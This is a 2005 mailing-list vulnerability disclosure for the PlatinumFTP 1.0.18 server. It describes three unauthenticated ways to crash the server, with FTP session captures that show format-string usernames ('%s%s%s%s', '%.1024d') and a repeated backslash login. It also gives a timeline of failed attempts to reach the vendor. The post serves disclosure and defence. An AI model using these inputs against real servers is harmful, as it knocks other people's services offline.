Date: Sat, 12 Mar 2005 17:04:31 +0100
From: ports <ml@portsonline.net.>
To: [email protected]Subject: PlatinumFTP 1.0.18 remote DoS
X-Enigmail-Version: 0.89.5.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: antivirus-gw at tyumen.ru
Application: PlantinumFTP
Site: http://www.roboshareware.com/indexplatinumftp.php
Version: 1.0.18 and maybe lower
OS: Windows
Bug: Remote Denial of Service
=====
Product:
PlatinumFTPserver simplifies management of all your Ftp clients with
regards to sending and receiving program and data files over an IP
connection.
=====
About:
I didn't found any informations about the Bugs I've found and the
vendor doesn't seem to be interested in fixing problems (see History).
Since PlatinumFTP isn't a mainstream server I decided to make this
Disclosure.
Well, I found 3 different ways do shut down (denial of service) a
PlatinumFTP 1.0.18 server. At least you doesn't need a valid user
=====
First Bug:
You can stop the server using %s%s%s%s as username.
-------------------- schnipp --------------------
ports@boom:~$ ftp 192.168.10.101
Connected to 192.168.10.101.
220-PlatinumFTPserver V1.0.18
220 Enter login details
Name (192.168.10.101:ports): %s%s%s%s
421 Service not available, remote server has closed connection
Login failed.
No control connection for command: Transport endpoint is not connected
ftp>
-------------------- schnapp --------------------
=====
Second Bug:
You can stop the server using %.1024d as username.
-------------------- schnipp --------------------
ports@boom:~$ ftp 192.168.10.101
Connected to 192.168.10.101.
220-PlatinumFTPserver V1.0.18
220 Enter login details
Name (192.168.10.101:ports): %.1024d
331 Password required for 000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000421 Service not available, remote server
has closed connection
Login failed.
No control connection for command: Transport endpoint is not connected
ftp>
-------------------- schnapp --------------------
=====
Third Bug:
Well, shuting down a server using the third bug is, compared to the
first Bugs, really tricky *cough*. If you put in a \ as username the
Server will show a requester on his console saying 'Incorrect Format:
HKEY_LOCAL_MACHINE\SOFTWARE\PlatinumFTPserver\Configuration\Users\'.
The ftp login process for the current session will stop until someone
affirmed this message.
I wrote a little perl script to see if it's possible to shut the server
down and it's working. You just have to connect a couple of times using
the username \ and after a few connections (>50) the server will crash.
Since most of you guys know how to write a script like that I doens't
attach it :) Of course you can find them later on my homepage.
=====
History:
2005-03-05: Found the Bugs and mailed the vendor
2005-03-07: Mailed the vendor again using all mailaddresse I found
2005-03-10: Created a yahoo-account *sigh* to make a forum post
2005-03-12: Still no response...
Well, now let's count the hours/days until someone is telling me I'm a
fool because I didn't made a working exploit out of it.
ports
